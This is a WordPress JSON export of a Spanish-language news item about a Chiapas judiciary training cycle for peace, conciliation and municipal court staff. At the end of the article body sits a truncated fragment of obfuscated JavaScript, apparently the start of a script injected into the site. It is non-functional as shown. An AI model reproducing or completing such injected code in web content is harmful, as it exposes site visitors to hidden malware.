{"id":23390,"date":"2025-08-07T04:21:19","date_gmt":"2025-08-07T04:21:19","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=23390"},"modified":"2025-08-07T04:21:20","modified_gmt":"2025-08-07T04:21:20","slug":"capacitacion-constante-fortalece-labor-de-los-juzgados-de-paz-y-conciliacion-y-municipales","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=23390","title":{"rendered":"Capacitaci\u00f3n constante fortalece labor de los Juzgados de Paz y Conciliaci\u00f3n y Municipales"},"content":{"rendered":"\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"682\" data-id=\"23393\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/08\/1000264452-1024x682.jpg\" alt=\"\" class=\"wp-image-23393\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/08\/1000264452-1024x682.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/08\/1000264452-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/08\/1000264452-768x512.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/08\/1000264452-1536x1024.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/08\/1000264452-2048x1365.jpg 2048w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/08\/1000264452-310x205.jpg 310w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"682\" data-id=\"23391\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/08\/1000264437-1024x682.jpg\" alt=\"\" class=\"wp-image-23391\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/08\/1000264437-1024x682.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/08\/1000264437-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/08\/1000264437-768x512.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/08\/1000264437-1536x1024.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/08\/1000264437-2048x1365.jpg 2048w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/08\/1000264437-310x205.jpg 310w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"682\" data-id=\"23394\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/08\/1000264443-1024x682.jpg\" alt=\"\" class=\"wp-image-23394\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/08\/1000264443-1024x682.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/08\/1000264443-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/08\/1000264443-768x512.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/08\/1000264443-1536x1024.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/08\/1000264443-2048x1365.jpg 2048w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/08\/1000264443-310x205.jpg 310w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"682\" data-id=\"23392\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/08\/1000264449-1024x682.jpg\" alt=\"\" class=\"wp-image-23392\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/08\/1000264449-1024x682.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/08\/1000264449-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/08\/1000264449-768x512.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/08\/1000264449-1536x1024.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/08\/1000264449-2048x1365.jpg 2048w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/08\/1000264449-310x205.jpg 310w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>Redacci\u00f3n.<\/p>\n\n\n\n<p>6 de agosto del 2025. Con el objetivo de reforzar las habilidades jur\u00eddicas y pr\u00e1cticas del personal que labora en los Juzgados de Paz y Conciliaci\u00f3n, de Paz y Conciliaci\u00f3n Ind\u00edgena, as\u00ed como en los Juzgados Municipales, el Poder Judicial del Estado de Chiapas arranc\u00f3 un ciclo de talleres y ponencias denominado \u201cFortalecimiento jur\u00eddico-pr\u00e1ctico de la competencia jurisdiccional y auxilios a autoridades\u201d.<\/p>\n\n\n\n<p>Desde el Aula Magna del Instituto de Formaci\u00f3n, Profesionalizaci\u00f3n y Carrera Judicial (IFPyCJ), se realiz\u00f3 el acto inaugural con la presencia del director de Juzgados de Paz y Conciliaci\u00f3n, Mariano L\u00f3pez P\u00e9rez, quien dirigi\u00f3 un mensaje de bienvenida a las y los asistentes, reconociendo la importancia de esta capacitaci\u00f3n para optimizar los procesos y fortalecer la impartici\u00f3n de justicia en cada municipio.<\/p>\n\n\n\n<p>En su intervenci\u00f3n, el director del IFPyCJ, Jos\u00e9 Luis Baltazar Arg\u00fcello, agradeci\u00f3 la participaci\u00f3n y, a nombre del magistrado presidente Juan Carlos Moreno Guill\u00e9n, les exhort\u00f3 a aprovechar al m\u00e1ximo estos espacios formativos. Subray\u00f3 que el fortalecimiento del conocimiento y las pr\u00e1cticas jur\u00eddicas son clave para garantizar un servicio eficiente, cercano y respetuoso de los derechos humanos.<\/p>\n\n\n\n<p>La primera ponencia de esta serie de capacitaciones estuvo disertada por la secretaria de acuerdos del Juzgado Cuarto Civil, Elvia Guadalupe Maza Mej\u00eda, quien imparti\u00f3 el taller pr\u00e1ctico sobre elaboraci\u00f3n de cuadernillos, acuerdos y diligencias, donde las y los participantes adquirieron herramientas metodol\u00f3gicas y t\u00e9cnicas para el adecuado manejo de documentos y procedimientos judiciales.<\/p>\n\n\n\n<p>El ciclo se realizar\u00e1 en seis sesiones los d\u00edas 06, 07, 08, 20, 21 y 22 del mes de agosto y contar\u00e1 con la presencia de jueces, juezas, secretarios y secretarias de Acuerdo y oficinistas de 40 municipios del estado, quienes reforzar\u00e1n sus conocimientos en beneficio de las personas usuarias de la justicia.<\/p>\n\n\n\n<p>Con estas acciones, el Poder Judicial del Estado reafirma su compromiso de impulsar la profesionalizaci\u00f3n continua, fortaleciendo las capacidades t\u00e9cnicas y operativas de quienes d\u00eda a d\u00eda contribuyen a la resoluci\u00f3n de conflictos y a la impartici\u00f3n de justicia en los diversos municipios de la entidad chiapaneca.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Redacci\u00f3n. 6 de agosto del 2025. Con el objetivo de reforzar las habilidades jur\u00eddicas y pr\u00e1cticas del personal que labora en los Juzgados de Paz y Conciliaci\u00f3n, de Paz y Conciliaci\u00f3n Ind\u00edgena, as\u00ed como en los Juzgados Municipales, el Poder Judicial del Estado de Chiapas arranc\u00f3 un ciclo de talleres y ponencias denominado \u201cFortalecimiento jur\u00eddico-pr\u00e1ctico &hellip;<\/p>\n","protected":false},"author":2,"featured_media":23394,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-23390","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/23390","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=23390"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/23390\/revisions"}],"predecessor-version":[{"id":23395,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/23390\/revisions\/23395"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/23394"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=23390"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=23390"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=23390"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}